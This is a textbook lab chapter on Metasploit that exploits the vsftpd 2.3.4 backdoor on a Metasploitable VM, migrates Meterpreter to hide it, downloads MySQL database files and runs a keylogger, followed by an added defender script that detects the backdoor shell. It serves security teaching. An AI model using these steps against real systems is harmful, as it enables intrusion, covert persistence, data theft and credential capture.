Chapter 14 Metasploit

14.1 Background

Metasploit is an exploitation framework developed by Rapid7. In this section we will walk through the steps that an attacker would take to break into a web server and the database containing the passwords for the website.

14.2 Using Exploits

Step 1 Start up the Metasploitable virtual machine. (This machine will be the web server that we attack in this exercise.) Log in with username: msfadmin, password: msfadmin, and get the IP address of the Metasploitable machine by running the ifconfig command. Write it down; you will need it in the next steps.

[Include Screen Shot]

Step 2 Click on the Metasploit icon. [Include picture]

[Include screen shot Metasploit Console]

Step 3 The Metasploit Framework is a collection of modules. Each module contains code designed to execute a particular exploit. In the next lab we will explore how modules are implemented by writing our own module; for this lab we will use an existing module in Metasploit. We will begin by loading the module that executes the FTP exploit (this will execute the attack from Chapter 2):

use exploit/unix/ftp/vsftpd_234_backdoor

[include screen shot]

Step 4 Next, set the IP address of the target that you want to attack (the option is called RHOSTS in newer Metasploit versions):

set RHOST <target-ip>

Step 4 Run the command below to launch the exploit and upload the Metasploit payload (Meterpreter):

exploit

[include screenshot]
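A defender-side check for what this exploit leaves behind on the server, added here as an example and not part of the original lab: the backdoor in vsftpd 2.3.4 that the vsftpd_234_backdoor module triggers spawns a root shell listening on TCP port 6200, so a shell process whose parent is vsftpd, or a listener on port 6200, indicates compromise. The process and socket tables below are constructed samples in ps -eo pid,ppid,comm and ss -ltnp format, not output captured from a real host.

```python
import re

# Added example, not part of the lab. The backdoor that vsftpd_234_backdoor
# triggers in vsftpd 2.3.4 spawns a root shell listening on TCP 6200, giving two
# host-side indicators: a shell whose parent is vsftpd, and a listener on 6200.
BACKDOOR_PORT = 6200
SHELLS = {"sh", "bash", "dash"}

# Constructed samples of `ps -eo pid,ppid,comm` and `ss -ltnp` output on a compromised host.
SAMPLE_PS = """\
  PID  PPID COMMAND
 4765     1 vsftpd
 5312  4765 sh
 4890     1 mysqld
"""

SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      1      0.0.0.0:21         0.0.0.0:*         users:(("vsftpd",pid=4765,fd=3))
LISTEN 0      1      0.0.0.0:6200       0.0.0.0:*         users:(("sh",pid=5312,fd=4))
LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=4890,fd=10))
"""

def parse_ps(text):
    """Map pid -> (ppid, comm) from ps output, skipping the header line."""
    procs = {}
    for line in text.splitlines()[1:]:
        pid, ppid, comm = line.split(None, 2)
        procs[int(pid)] = (int(ppid), comm)
    return procs

def shells_under_vsftpd(procs):
    """Pids of shell processes whose parent process is vsftpd."""
    return sorted(pid for pid, (ppid, comm) in procs.items()
                  if comm in SHELLS and procs.get(ppid, (0, ""))[1] == "vsftpd")

def backdoor_listeners(text):
    """(pid, comm) for every LISTEN socket bound to BACKDOOR_PORT."""
    pat = re.compile(r'^LISTEN\s+\S+\s+\S+\s+\S+:(\d+)\s.*users:\(\("([^"]+)",pid=(\d+)')
    matches = (pat.match(line) for line in text.splitlines())
    return [(int(m.group(3)), m.group(2)) for m in matches
            if m and int(m.group(1)) == BACKDOOR_PORT]

def audit(ps_text, ss_text):
    # Combine both indicators into a list of alert strings.
    procs = parse_ps(ps_text)
    findings = [f"shell pid {p} spawned by vsftpd" for p in shells_under_vsftpd(procs)]
    findings += [f"{c} (pid {p}) listening on tcp/{BACKDOOR_PORT}"
                 for p, c in backdoor_listeners(ss_text)]
    return findings
```

Running audit(SAMPLE_PS, SAMPLE_SS) flags both the shell spawned under vsftpd and its listener on port 6200, while the legitimate FTP and MySQL listeners produce no alerts.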

14.3 Hiding the Meterpreter process by migrating it

Once the attacker has uploaded a Metasploit payload, they don't want the user to notice the process and kill it, so they often hide the Meterpreter process by migrating it into another process.

Step 5 Get a list of the running processes by running the ps command:

ps [include screenshot]

Step 6 Hide the process by migrating it into another process, by running:

migrate 682 [Update to match a process in the list]

14.4 Exploring the file system

Great, now that you have run the exploit and uploaded the Metasploit payload you should have a reverse shell. Let's explore the file system on the web server.

Step 5 Run the pwd command. Notice that it prints the current working directory of the session.

[include screenshot]

Step 6 Navigate to the directory containing the database files by running the following command:

cd /var/lib/mysql/ [include screenshot]

Step 7 Download one of the database files by running the command below:

download [filename] [Include screen shot]

14.5 Key Logging

Great, you have successfully retrieved the database file from the system. But you still don't know the admin password for the system. Knowing it would make it very convenient to log back into the system, and even into other systems, without creating too much noise.

Step 8 Start a keylogger so that you can collect usernames and passwords from the system by running the keyscan_start command.

[Include Screen shot]

Step 9 Test the keylogger by logging into the Metasploitable virtual machine and running the sudo command. (Username: msfadmin, password: msfadmin)

[Include screenshot]

Step 7 Open the window containing the Meterpreter session and run the command keyscan_dump. Notice anything? [Include screenshot below]